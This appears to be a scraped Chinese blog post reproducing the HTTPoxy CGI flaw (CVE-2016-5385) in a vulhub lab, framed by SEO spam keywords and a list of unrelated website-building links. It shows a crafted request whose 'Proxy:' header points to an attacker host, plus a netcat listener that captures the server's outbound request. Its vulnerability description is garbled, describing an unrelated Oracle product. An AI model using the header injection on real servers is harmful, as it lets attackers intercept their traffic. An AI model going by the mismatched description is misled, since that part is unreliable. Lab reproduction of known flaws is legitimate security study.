当前位置: 首页 > news >正文

全网站开发是什么外贸网站建站多少钱

全网站开发是什么,外贸网站建站多少钱,厦门网站制作推广,外贸网店平台HTTPoxy CGI 应用程序漏洞 CVE-2016-5385 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议 漏洞名称 漏洞描述 在Oracle Communications BRM 10.x/12.x(云软件)中发现漏洞。它已经被宣布为关键。此漏洞影响组件用户数据库的未…

HTTPoxy CGI 应用程序漏洞 CVE-2016-5385 已亲自复现

  • 漏洞名称
    • 漏洞描述
    • 影响版本
  • 漏洞复现
    • 环境搭建
    • 漏洞利用
  • 修复建议

漏洞名称

漏洞描述

在Oracle Communications BRM 10.x/12.x(云软件)中发现漏洞。它已经被宣布为关键。此漏洞影响组件用户数据库的未知功能。升级可消除此漏洞。在泄露漏洞后立即发布了可能的缓解措施。可以使用Snort ID 39737来识别攻击企图。

影响版本

Redhat Enterprise_Linux_Server 6.0
Oracle Communications_User_Data_Repository 12.0.0
Oracle Enterprise_Manager_Ops_Center 12.3.2
Oracle Communications_User_Data_Repository 10.0.0
8.0.0 <= Drupal < 8.1.7

漏洞复现

环境搭建

受害者IP:192.168.63.129:8080
攻击者IP:192.168.63.1

vulhub下载链接

https://github.com/vulhub/vulhub
git clone https://github.com/vulhub/vulhub.git

启动vulfocus

docker-compose up -d 

环境启动后,访问http://192.168.63.129:8080即可看到一个nginx页面,说明已成功启动。
在这里插入图片描述

漏洞利用

正常请求http://192.168.63.129:8080/index.php,可见其Origin为当前请求的服务器,这里用的自己搭建的环境,因此返回公网的IP地址。正常情况下与请求头中的host一致。

在这里插入图片描述

在请求头中加入proxy代理,这里的Proxy: http://192.168.63.1:1234/不是 HTTP 代理,在主机192.168.63.1中不存在该http服务。因此在响应体中返回报错信息。

GET /index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Proxy: http://192.168.63.1:1234/

在这里插入图片描述

在192.168.63.1主机上监听端口,我们可以捕获原始请求。

nc -lvnp 1234

在这里插入图片描述

在vulhub的官网中,响应体返回了正常的请求内容,在Origin返回当前请求的服务器,与上面返回错误不同的是,这里使用的是可以访问的HTTP代理,存在http服务。

在这里插入图片描述

修复建议

1、补丁链接:https://www.php.net/downloads 5.6.24修复了该漏洞

http://www.yayakq.cn/news/898135/

相关文章:

  • 临沂罗庄做网站公司网站开发筛子游戏
  • 做外贸做什么网站好网页设计与制作期末考试试题
  • 如何搭建视频网站广东购物网站建设价格
  • 网站建设费用IP申请域名建立网站
  • 缘魁网站建设小程序制作需要营业执照吗
  • 建设网站 知乎网站首页制作浩森宇特
  • 江苏专业网站建设公司电话辞职做网站
  • 云建站产品设计手绘图片
  • CMS源码就可以做网站吗外贸网上营销的途径有哪些
  • 株洲做网站哪家好flash网站 seo
  • 郑州 手机网站制作网页版qq邮箱怎么发文件
  • wordpress网站安全平面设计接私活一般多少钱
  • 小型企业网络建设方案搜索引擎营销就是seo
  • 专业的集团网站建设建设银行怀柔支行营业部网站
  • 响应式网站导航栏内容遂川网站建设
  • 阿里云建站后台建站wordpress install.php空白页
  • 哪些网站可以做兼职设计师深圳市住房和城乡建设局网站首页
  • 彩票销信 网站怎么做手机百度收录提交入口
  • 做同城服务网站比较成功的网站网页加速器手机版
  • 上海 企业网站制wordpress自定义上传头像
  • 一站式最好的建设网站
  • 网站建设丿金手指稳定杭州软件制作
  • 东莞外贸建站模板申请建设银行官方网站
  • 集团企业网站建设重庆一家和兴装饰设计有限公司
  • 金融网站欣赏免费技能培训网
  • 深圳市福田建设局网站网站建设维护学什么科目
  • 重庆好的网站建设如何做网站答题领红包链接
  • qq游戏做任务领铜板网站深圳市创想三维科技有限公司
  • 自己做的网站数据库免费咨询身高发育
  • 网站建设的课程设计报告网站升级公告模板